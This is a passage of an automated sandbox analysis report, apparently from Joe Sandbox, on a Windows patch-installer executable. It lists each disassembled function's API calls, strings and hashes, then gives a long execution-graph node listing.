                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: Event$CloseCreateDialogHandleMultipleObjectsParentProcessSleepTerminateWait
                                                                                              • String ID: Global\HotfixNoShutDown
                                                                                              • API String ID: 2160021069-3107748146
                                                                                              • Opcode ID: 400348b860b79de6a0f3343453eb6026b643485889c826b2de8ec5d488a1a1e5
                                                                                              • Instruction ID: 565771bbe1ded297f6e1eeab05adb2a6758b43a142e37d2f74b43153d2bd27e5
                                                                                              • Opcode Fuzzy Hash: 400348b860b79de6a0f3343453eb6026b643485889c826b2de8ec5d488a1a1e5
                                                                                              • Instruction Fuzzy Hash: D2219271405214EFFB339FA4DD0C9AE7FB5EB09751F00816AF695920C9D7BA8980CBA0
                                                                                              Function 0100360C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 67libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0100367A
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 0100369F
                                                                                              • GetProcAddress.KERNEL32(00000000,GetFilePatchSignatureA), ref: 010036BA
                                                                                              • GetProcAddress.KERNEL32(ApplyPatchToFileA), ref: 010036CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: ApplyPatchToFileA$GetFilePatchSignatureA$c:\36a8a8e2fed651ec27d1eed188bb35$mspatcha.dll$options$patchdll
                                                                                              • API String ID: 2141747552-487975385
                                                                                              • Opcode ID: d75fadbb291985e4ccfd5039247aea78be2d5ca5f0885812797b6874b77ceae2
                                                                                              • Instruction ID: 86fcc2cc3a29359986d7a0763a20f979a07127794a10d9aeb92e6956b3d7621c
                                                                                              • Opcode Fuzzy Hash: d75fadbb291985e4ccfd5039247aea78be2d5ca5f0885812797b6874b77ceae2
                                                                                              • Instruction Fuzzy Hash: 012121B1900218AFFB37DBA9DD0DBD637ACBB09304F0085A5B6C997284D7B99684CB50
                                                                                              Function 01002D78 Relevance: 15.1, APIs: 10, Instructions: 72fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002D82
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,01003914), ref: 01002D98
                                                                                              • CloseHandle.KERNEL32(0000030C,?,?,?,01003914), ref: 01002DAC
                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,01003914), ref: 01002DD0
                                                                                              • GetLastError.KERNEL32(?,?,?,01003914), ref: 01002DDA
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002DF1
                                                                                              • RemoveDirectoryA.KERNEL32(?,?,?,?,01003914), ref: 01002E12
                                                                                              • GetLastError.KERNEL32(?,?,?,01003914), ref: 01002E1C
                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 01002E33
                                                                                              • LeaveCriticalSection.KERNEL32(0100D060,?,?,?,01003914), ref: 01002E44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCriticalErrorHandleLastMoveSection$DeleteDirectoryEnterLeaveRemove
                                                                                              • String ID:
                                                                                              • API String ID: 3032557604-0
                                                                                              • Opcode ID: 2a2974ac5940014a36d8b734e7ae464734aed0013697c2f22aefec969e3d7cea
                                                                                              • Instruction ID: eaeb66f063d6c446da59646d057841921a657097434ac8a43aedc69f3ce3f5a1
                                                                                              • Opcode Fuzzy Hash: 2a2974ac5940014a36d8b734e7ae464734aed0013697c2f22aefec969e3d7cea
                                                                                              • Instruction Fuzzy Hash: 9E219F316403409BF6B3DB58DA4DB1A7BAAEB04721F164595F6D6E31C5C739EC00CB61
                                                                                              Function 010033DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(76F92EE0,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 010033E4
                                                                                              • SetFilePointer.KERNEL32(FFFFFFFF,00000000,00000000,00000002,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 010033FD
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00000000,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 01003427
                                                                                              • WriteFile.KERNEL32(***,***,00000000,00000000,?,?,?,?,?,010034CC,?,?,?,010038D5,?,?), ref: 0100344E
                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 0100345B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastWrite$Pointer
                                                                                              • String ID: ***
                                                                                              • API String ID: 1741213463-1787515470
                                                                                              • Opcode ID: f259f0daa3fa8cc644dd96105249b9c34566c8285c111745a810dfbc4c84cd6b
                                                                                              • Instruction ID: 44ff794e02d1a3db74c08f5772ca78b3d7dcc110a49943917282bb4f95e92f64
                                                                                              • Opcode Fuzzy Hash: f259f0daa3fa8cc644dd96105249b9c34566c8285c111745a810dfbc4c84cd6b
                                                                                              • Instruction Fuzzy Hash: 4211E5B5600108BFEB138FE8DC8CDAA3FADEB49240F014165BB81DB155EA76AD09C760
                                                                                              Function 010044AD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile_stricmpsprintfstrrchr
                                                                                              • String ID: .%03u$.sys
                                                                                              • API String ID: 3323407637-674990528
                                                                                              • Opcode ID: 1ff158e2bc5fa47faf8acc8ac29c6469c21ce8e7ed94fe9ef2c6fd643a7bfcd0
                                                                                              • Instruction ID: 49d5ea88e9c73088097ed9a15219229db482fa6d83c04b0c91c0a0ec1b993438
                                                                                              • Opcode Fuzzy Hash: 1ff158e2bc5fa47faf8acc8ac29c6469c21ce8e7ed94fe9ef2c6fd643a7bfcd0
                                                                                              • Instruction Fuzzy Hash: 9D0190352042005FF3134B6DAC889A73BE9DFCA622F10812EF7C4C31C1CE7588018364
                                                                                              Function 01003892 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 010038A6
                                                                                              • LoadStringA.USER32(20000003,?,00000080,?), ref: 010038ED
                                                                                              • MessageBoxA.USER32(?,00000000,00010010), ref: 01003909
                                                                                              • DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
                                                                                              • ExitProcess.KERNEL32 ref: 01003935
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalDeleteErrorExitLastLoadMessageProcessSectionString
                                                                                              • String ID:
                                                                                              • API String ID: 3880362259-0
                                                                                              • Opcode ID: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
                                                                                              • Instruction ID: 95fc673a3485858558866d3e75a01873537341b781b9074dca4c1e746b7b8f2d
                                                                                              • Opcode Fuzzy Hash: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
                                                                                              • Instruction Fuzzy Hash: C2018435401118AFFB73EBA4DD8CBE977B8BB04315F140295FAC0A60C4DB795A48CBA1
                                                                                              Function 0100628C Relevance: 7.5, APIs: 5, Instructions: 36timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 010062A9
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 010062B5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 010062BD
                                                                                              • GetTickCount.KERNEL32 ref: 010062C5
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 010062D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                              • String ID:
                                                                                              • API String ID: 1445889803-0
                                                                                              • Opcode ID: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
                                                                                              • Instruction ID: cb9998d7c512c76f87658832ca3486ab159dbae6228a0cd13093ddd9b699de7a
                                                                                              • Opcode Fuzzy Hash: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
                                                                                              • Instruction Fuzzy Hash: 00F03C36D002189BEB22EBF8E44C59AB7F9EF0C310F4106A1F591E7146DB3AE900CB80
                                                                                              Function 01002821 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(0000030C,00000000,00000000,00000000), ref: 0100283D
                                                                                              • ReadFile.KERNEL32(Sdwn,00000314,?,00000000), ref: 01002859
                                                                                              • _snprintf.MSVCRT ref: 0100289F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2632701460.0000000001002000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2632488291.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2632867734.000000000100C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PointerRead_snprintf
                                                                                              • String ID: Sdwn
                                                                                              • API String ID: 1063975976-2102837186
                                                                                              • Opcode ID: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
                                                                                              • Instruction ID: 9dcb7796340e3617a47c656186b8592bb183c83f9254e4a58000cb69e97ca3b5
                                                                                              • Opcode Fuzzy Hash: cbd71d36e9f98fb81e9e7a2f7e14d0f9a5e3fb102f12bd1d6d3dfab898bb688e
                                                                                              • Instruction Fuzzy Hash: F311A176501344ABF7338768AA8DB623BD8A706374F1403D9F5D1A20DAC37A4B84C379

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.2%
                                                                                              Dynamic/Decrypted Code Coverage:2.9%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:1531
                                                                                              Total number of Limit Nodes:36
                                                                                              execution_graph 71844 6395bf84 GetWindowLongW 71845 6395bfa5 71844->71845 71846 6395c06e 71844->71846 71847 6395bfae 71845->71847 71851 6395c00f _memset 71845->71851 71848 6395c074 PostMessageW 71846->71848 71849 6395c056 71846->71849 71847->71849 71850 6395bfbb GetForegroundWindow 71847->71850 71856 6395bfff 71848->71856 71859 63965ec4 71849->71859 71852 6395bfc9 71850->71852 71850->71856 71851->71849 71854 6395c026 GetSystemMenu GetMenuItemInfoW 71851->71854 71853 6395bfd2 IsWindowVisible 71852->71853 71852->71856 71855 6395bfe3 71853->71855 71853->71856 71854->71849 71854->71856 71857 6395bfef SetForegroundWindow 71855->71857 71857->71856 71860 63965ee6 71859->71860 71868 639582a2 71860->71868 71862 63965f32 GetWindowLongW CallWindowProcW 71864 63965f64 GetWindowLongW 71862->71864 71865 63965f7f 71862->71865 71863 63965f1a CallWindowProcW 71863->71865 71864->71865 71866 63965f71 SetWindowLongW 71864->71866 71865->71856 71866->71865 71869 639582eb 71868->71869 71870 639582b6 71868->71870 71869->71862 71869->71863 71869->71865 71870->71869 71872 63965402 DefWindowProcW 71870->71872 71872->71869 71873 6c8f830c 71880 6c8ff821 71873->71880 71936 6c8f76a7 71880->71936 71937 6c8f76b3 __EH_prolog3 71936->71937 71970 6c91c0aa 71937->71970 71940 6c8f7716 71990 6c8c77af RegOpenKeyExW 71940->71990 71944 6c91c0aa ctype 77 API calls 71945 6c8f772f GetModuleHandleW 71944->71945 71947 6c8f776f SetUnhandledExceptionFilter GetCommandLineW 71945->71947 71948 6c8f7752 GetProcAddress 71945->71948 71998 6c8c3e77 71947->71998 71948->71947 71949 6c8f7769 SetThreadStackGuarantee 71948->71949 71949->71947 71951 6c8f778a 72110 6c909293 GetCommandLineW 71951->72110 71957 6c8f77c5 72178 6c8c41d6 71957->72178 71974 6c91c0b4 71970->71974 71972 6c8f7704 71972->71940 71982 6c8c7c6e 71972->71982 71974->71972 71977 6c91c0d0 std::exception::exception 71974->71977 72186 6c91bfb3 71974->72186 72203 6c921247 _DecodePointerInternal 71974->72203 71975 6c91c10e 72205 6c9213ee 66 API calls std::exception::operator= 71975->72205 71977->71975 72204 6c91b1d7 76 API calls __cinit 71977->72204 71978 6c91c118 72206 6c9214aa 71978->72206 71981 6c91c129 71983 6c8c7c7a __EH_prolog3 71982->71983 72217 6c918e54 71983->72217 71986 6c918e54 ctype KiUserExceptionDispatcher 71987 6c8c7cba 71986->71987 72221 6c8c7ce8 71987->72221 71989 6c8c7cd9 ctype 71989->71940 71991 6c8c785b RegCloseKey 71990->71991 71992 6c8c77f2 RegCreateKeyExW 71990->71992 71994 6c91b091 __fputwc_nolock 5 API calls 71991->71994 71992->71991 71993 6c8c780f 71992->71993 72463 6c8c787b 71993->72463 71996 6c8c7874 71994->71996 71996->71944 71997 6c8c781a RegSetValueExW RegSetValueExW 71997->71991 71999 6c8c3e83 __EH_prolog3 71998->71999 72000 6c8f833e ctype 110 API calls 71999->72000 72001 6c8c3e9f 72000->72001 72002 6c8c419a ctype 72001->72002 72003 6c8f833e ctype 110 API calls 72001->72003 72002->71951 72004 6c8c3eca 72003->72004 72540 6c8f9067 72004->72540 72006 6c8c3ed6 72007 6c918f0e ctype RtlFreeHeap 72006->72007 72008 6c8c3ee5 72007->72008 72009 6c8f833e ctype 110 API calls 72008->72009 72010 6c8c3ef3 72009->72010 72011 6c8f9067 ctype 71 API calls 72010->72011 72012 6c8c3eff 72011->72012 72013 6c918f0e ctype RtlFreeHeap 72012->72013 72014 6c8c3f0e 72013->72014 72015 6c8f833e ctype 110 API calls 72014->72015 72016 6c8c3f1c 72015->72016 72017 6c8f9067 ctype 71 API calls 72016->72017 72018 6c8c3f28 72017->72018 72019 6c918f0e ctype RtlFreeHeap 72018->72019 72020 6c8c3f37 72019->72020 72021 6c8f833e ctype 110 API calls 72020->72021 72022 6c8c3f45 72021->72022 72023 6c8f9067 ctype 71 API calls 72022->72023 72024 6c8c3f51 72023->72024 72025 6c918f0e ctype RtlFreeHeap 72024->72025 72026 6c8c3f60 72025->72026 72027 6c8f833e ctype 110 API calls 72026->72027 72028 6c8c3f6e 72027->72028 72029 6c8f9067 ctype 71 API calls 72028->72029 72030 6c8c3f7a 72029->72030 72031 6c918f0e ctype RtlFreeHeap 72030->72031 72032 6c8c3f89 72031->72032 72033 6c8f833e ctype 110 API calls 72032->72033 72034 6c8c3f97 72033->72034 72035 6c8f9067 ctype 71 API calls 72034->72035 72036 6c8c3fa3 72035->72036 72037 6c918f0e ctype RtlFreeHeap 72036->72037 72038 6c8c3fb2 72037->72038 72039 6c8f833e ctype 110 API calls 72038->72039 72040 6c8c3fc0 72039->72040 72041 6c8f9067 ctype 71 API calls 72040->72041 72042 6c8c3fcc 72041->72042 72043 6c918f0e ctype RtlFreeHeap 72042->72043 72044 6c8c3fdb 72043->72044 72045 6c8f833e ctype 110 API calls 72044->72045 72046 6c8c3fe9 72045->72046 72047 6c8f9067 ctype 71 API calls 72046->72047 72048 6c8c3ff5 72047->72048 72049 6c918f0e ctype RtlFreeHeap 72048->72049 72050 6c8c4004 72049->72050 72051 6c8f833e ctype 110 API calls 72050->72051 72052 6c8c4012 72051->72052 72053 6c8f9067 ctype 71 API calls 72052->72053 72054 6c8c401e 72053->72054 72055 6c918f0e ctype RtlFreeHeap 72054->72055 72056 6c8c402d 72055->72056 72057 6c8f833e ctype 110 API calls 72056->72057 72058 6c8c403b 72057->72058 72059 6c8f9067 ctype 71 API calls 72058->72059 72060 6c8c4047 72059->72060 72061 6c918f0e ctype RtlFreeHeap 72060->72061 72062 6c8c4056 72061->72062 72063 6c8f833e ctype 110 API calls 72062->72063 72064 6c8c4064 72063->72064 72065 6c8f9067 ctype 71 API calls 72064->72065 72066 6c8c4070 72065->72066 72067 6c918f0e ctype RtlFreeHeap 72066->72067 72068 6c8c407f 72067->72068 72069 6c8f833e ctype 110 API calls 72068->72069 72070 6c8c408d 72069->72070 72071 6c8f9067 ctype 71 API calls 72070->72071 72072 6c8c4099 72071->72072 72073 6c918f0e ctype RtlFreeHeap 72072->72073 72074 6c8c40a8 72073->72074 72075 6c8f833e ctype 110 API calls 72074->72075 72076 6c8c40b6 72075->72076 72077 6c8f9067 ctype 71 API calls 72076->72077 72078 6c8c40c2 72077->72078 72079 6c918f0e ctype RtlFreeHeap 72078->72079 72080 6c8c40d1 72079->72080 72081 6c8f833e ctype 110 API calls 72080->72081 72082 6c8c40df 72081->72082 72083 6c8f9067 ctype 71 API calls 72082->72083 72084 6c8c40eb 72083->72084 72085 6c918f0e ctype RtlFreeHeap 72084->72085 72086 6c8c40fa 72085->72086 72087 6c8f833e ctype 110 API calls 72086->72087 72088 6c8c4108 72087->72088 72089 6c8f9067 ctype 71 API calls 72088->72089 72090 6c8c4114 72089->72090 72091 6c918f0e ctype RtlFreeHeap 72090->72091 72092 6c8c4123 72091->72092 72093 6c8f833e ctype 110 API calls 72092->72093 72094 6c8c4131 72093->72094 72095 6c8f9067 ctype 71 API calls 72094->72095 72096 6c8c413d 72095->72096 72097 6c918f0e ctype RtlFreeHeap 72096->72097 72098 6c8c414c 72097->72098 72099 6c8f833e ctype 110 API calls 72098->72099 72100 6c8c415a 72099->72100 72101 6c8f9067 ctype 71 API calls 72100->72101 72102 6c8c4166 72101->72102 72103 6c918f0e ctype RtlFreeHeap 72102->72103 72104 6c8c4175 72103->72104 72105 6c8f833e ctype 110 API calls 72104->72105 72106 6c8c4183 72105->72106 72107 6c8f9067 ctype 71 API calls 72106->72107 72108 6c8c418f 72107->72108 72109 6c918f0e ctype RtlFreeHeap 72108->72109 72109->72002 72111 6c8c3e77 ctype 114 API calls 72110->72111 72112 6c9092d0 72111->72112 72593 6c8c4486 72112->72593 72115 6c918f0e ctype RtlFreeHeap 72116 6c9092f4 72115->72116 72122 6c9092f8 72116->72122 72596 6c8c423c 111 API calls ctype 72116->72596 72118 6c909320 72121 6c8c3a16 ctype 111 API calls 72118->72121 72118->72122 72119 6c8c41a9 ctype 67 API calls 72120 6c8f7793 72119->72120 72123 6c8c420c 72120->72123 72121->72122 72122->72119 72124 6c8c41d6 111 API calls 72123->72124 72125 6c8c4216 72124->72125 72126 6c8c422a 72125->72126 72127 6c8c3a16 ctype 111 API calls 72125->72127 72128 6c8c3a16 72126->72128 72127->72126 72129 6c8c3a22 __EH_prolog3 72128->72129 72130 6c8f833e ctype 110 API calls 72129->72130 72131 6c8c3a36 72130->72131 72677 6c8f88d1 72131->72677 72134 6c918eab ctype 67 API calls 72135 6c8c3a50 72134->72135 72136 6c8f88d1 ctype 102 API calls 72135->72136 72137 6c8c3a62 72136->72137 72684 6c8f8cd5 72137->72684 72139 6c8c3a73 72690 6c8f8c7a 72139->72690 72141 6c8c3a8f ctype 72142 6c8f8cd5 ctype 101 API calls 72141->72142 72148 6c8c3ad6 ctype 72141->72148 72143 6c8c3abc 72142->72143 72145 6c8f8c7a ctype 101 API calls 72143->72145 72144 6c8c3b0c 72147 6c8c3b1f 72144->72147 72149 6c918f0e ctype RtlFreeHeap 72144->72149 72145->72148 72146 6c918f0e ctype RtlFreeHeap 72146->72144 72150 6c8c3b32 72147->72150 72151 6c918f0e ctype RtlFreeHeap 72147->72151 72148->72144 72148->72146 72149->72147 72152 6c8c3b4c 72150->72152 72153 6c918f0e ctype RtlFreeHeap 72150->72153 72151->72150 72154 6c8f8cd5 ctype 101 API calls 72152->72154 72157 6c8c3b52 72152->72157 72153->72152 72155 6c8c3b6b 72154->72155 72696 6c8f8a98 72155->72696 72158 6c918f0e ctype RtlFreeHeap 72157->72158 72160 6c8c3c74 72158->72160 72162 6c918f0e ctype RtlFreeHeap 72160->72162 72164 6c8c3c7f ctype 72162->72164 72164->71957 72165 6c8c3bf2 72168 6c8c3c13 72165->72168 72169 6c918f0e ctype RtlFreeHeap 72165->72169 72166 6c8f8cd5 ctype 101 API calls 72167 6c8c3bb6 72166->72167 72171 6c8f8a98 ctype 67 API calls 72167->72171 72170 6c8c3c26 72168->72170 72172 6c918f0e ctype RtlFreeHeap 72168->72172 72169->72168 72173 6c8c3c39 72170->72173 72175 6c918f0e ctype RtlFreeHeap 72170->72175 72174 6c8c3bda 72171->72174 72172->72170 72173->72157 72177 6c918f0e ctype RtlFreeHeap 72173->72177 72176 6c8f85bc ctype KiUserExceptionDispatcher 72174->72176 72175->72173 72176->72165 72177->72157 72179 6c8c3a16 ctype 111 API calls 72178->72179 72180 6c8c41e9 72179->72180 72181 6c8c41fa 72180->72181 72182 6c8c3a16 ctype 111 API calls 72180->72182 72183 6c8c41a9 72181->72183 72182->72181 72780 6c90657a 72183->72780 72187 6c91c030 72186->72187 72200 6c91bfc1 72186->72200 72215 6c921247 _DecodePointerInternal 72187->72215 72189 6c91c036 72216 6c91bd29 66 API calls __getptd_noexit 72189->72216 72190 6c91bfcc 72190->72200 72209 6c9211f5 66 API calls 2 library calls 72190->72209 72210 6c921041 66 API calls 7 library calls 72190->72210 72211 6c91d835 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72190->72211 72193 6c91bfef RtlAllocateHeap 72194 6c91c028 72193->72194 72193->72200 72194->71974 72196 6c91c01c 72213 6c91bd29 66 API calls __getptd_noexit 72196->72213 72200->72190 72200->72193 72200->72196 72201 6c91c01a 72200->72201 72212 6c921247 _DecodePointerInternal 72200->72212 72214 6c91bd29 66 API calls __getptd_noexit 72201->72214 72203->71974 72204->71975 72205->71978 72207 6c9214d3 72206->72207 72208 6c9214df KiUserExceptionDispatcher 72206->72208 72207->72208 72208->71981 72209->72190 72210->72190 72212->72200 72213->72201 72214->72194 72215->72189 72216->72194 72218 6c8c7cad 72217->72218 72219 6c918e58 72217->72219 72218->71986 72245 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72219->72245 72222 6c8c7cf4 __EH_prolog3 72221->72222 72246 6c8f833e 72222->72246 72224 6c8c7d16 72254 6c8c7ee4 72224->72254 72226 6c8c7d25 72262 6c918f0e 72226->72262 72230 6c8c7d3d ctype 72231 6c918f0e ctype RtlFreeHeap 72230->72231 72232 6c8c7d5c 72231->72232 72233 6c8c5dd0 113 API calls 72232->72233 72234 6c8c7d65 ctype 72233->72234 72235 6c918f0e ctype RtlFreeHeap 72234->72235 72236 6c8c7d8a ctype 72235->72236 72280 6c8c5485 72236->72280 72238 6c8c7daf ctype 72239 6c918f0e ctype RtlFreeHeap 72238->72239 72240 6c8c7dd4 72239->72240 72290 6c8c575e 72240->72290 72242 6c8c7ddd ctype 72243 6c918f0e ctype RtlFreeHeap 72242->72243 72244 6c8c7e02 ctype 72243->72244 72244->71989 72247 6c8f834a __EH_prolog3 72246->72247 72248 6c918e54 ctype KiUserExceptionDispatcher 72247->72248 72249 6c8f8357 72248->72249 72295 6c8ffe8a 72249->72295 72252 6c8f8371 ctype 72252->72224 72255 6c8c7ef0 __EH_prolog3 72254->72255 72379 6c918eab 72255->72379 72260 6c918f0e ctype RtlFreeHeap 72261 6c8c7f26 ctype 72260->72261 72261->72226 72263 6c8c7d34 72262->72263 72264 6c918f1d 72262->72264 72266 6c8c5dd0 72263->72266 72395 6c9254f2 72264->72395 72267 6c8c5ddc __EH_prolog3 72266->72267 72398 6c8c5c6f 72267->72398 72269 6c8c5df0 72270 6c918eab ctype 67 API calls 72269->72270 72271 6c8c5e01 72270->72271 72408 6c8c5e41 72271->72408 72273 6c8c5e13 72274 6c8f84b9 ctype 101 API calls 72273->72274 72275 6c8c5e1c 72274->72275 72276 6c918f0e ctype RtlFreeHeap 72275->72276 72277 6c8c5e27 72276->72277 72278 6c918f0e ctype RtlFreeHeap 72277->72278 72279 6c8c5e32 ctype 72278->72279 72279->72230 72445 6c926e1a 72280->72445 72282 6c8c5491 GetModuleHandleW 72283 6c8c54a6 72282->72283 72284 6c8c54b3 GetProcAddress 72282->72284 72287 6c8f833e ctype 110 API calls 72283->72287 72285 6c8c54cb GetNativeSystemInfo 72284->72285 72286 6c8c54c5 72284->72286 72446 6c8c4ea3 72285->72446 72286->72285 72289 6c8c54b1 ctype 72287->72289 72289->72238 72457 6c8c5727 GetModuleHandleW 72290->72457 72294 6c8c578e 72294->72242 72296 6c8f8364 72295->72296 72297 6c8ffe96 72295->72297 72296->72252 72299 6c918c76 72296->72299 72297->72296 72303 6c8f8b33 110 API calls ctype 72297->72303 72300 6c918c84 ctype 72299->72300 72304 6c918bdc 72300->72304 72303->72296 72305 6c918bf0 72304->72305 72306 6c918be9 72304->72306 72307 6c918c02 72305->72307 72326 6c918e8c KiUserExceptionDispatcher __CxxThrowException@8 72305->72326 72325 6c918b95 KiUserExceptionDispatcher RtlFreeHeap ctype 72306->72325 72319 6c918d91 72307->72319 72312 6c918c31 72328 6c91b1f3 72312->72328 72313 6c918c1d 72327 6c91b6ef 66 API calls 2 library calls 72313->72327 72316 6c918c2f 72337 6c918dcd 72316->72337 72318 6c918bee 72318->72252 72320 6c918da6 72319->72320 72321 6c918d9c 72319->72321 